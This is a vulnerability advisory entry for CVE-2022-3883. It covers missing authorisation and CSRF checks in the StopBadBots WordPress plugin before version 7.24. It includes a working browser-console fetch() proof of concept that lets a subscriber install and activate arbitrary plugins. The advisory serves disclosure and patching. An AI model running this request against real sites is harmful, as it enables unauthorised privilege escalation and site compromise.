Lucene search
Lana CodesWPEX-ID:8695B157-ABAC-4AA6-A022-E3AE41C03544HistoryNov 21, 2022 - 12:00 a.m.
StopBadBots < 7.24 - Subscriber+ Arbitrary Plugin Installation
2022-11-2100:00:00
Lana Codes
127
stopbadbots
version 7.24
subscriber
arbitrary plugin installation
web browser
developer console
blog
install
activate
classic-editor
exploit
0.001 Low
EPSS
Percentile
20.3%
The plugin does not have proper authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscriber to call it and install and activate arbitrary plugins from wordpress.org
Run the below command in the developer console of the web browser while being on the blog as a subscriber user to install and activate the classic-editor plugin
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=stopbadbots_install_plugin&slug=classic-editor',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));Related
nvd
nvd
CVE-2022-3883
2022-12-12 18:15:11
prion
prion
Cross site request forgery (csrf)
2022-12-12 18:15:00
wpvulndb
wpvulndb
StopBadBots < 7.24 - Subscriber+ Arbitrary Plugin Installation
2022-11-21 00:00:00
cvelist
cvelist
CVE-2022-3883 StopBadBots < 7.24 - Subscriber+ Arbitrary Plugin Installation
2022-12-12 17:54:36
cve
cve
CVE-2022-3883
2022-12-12 18:15:11
patchstack
patchstack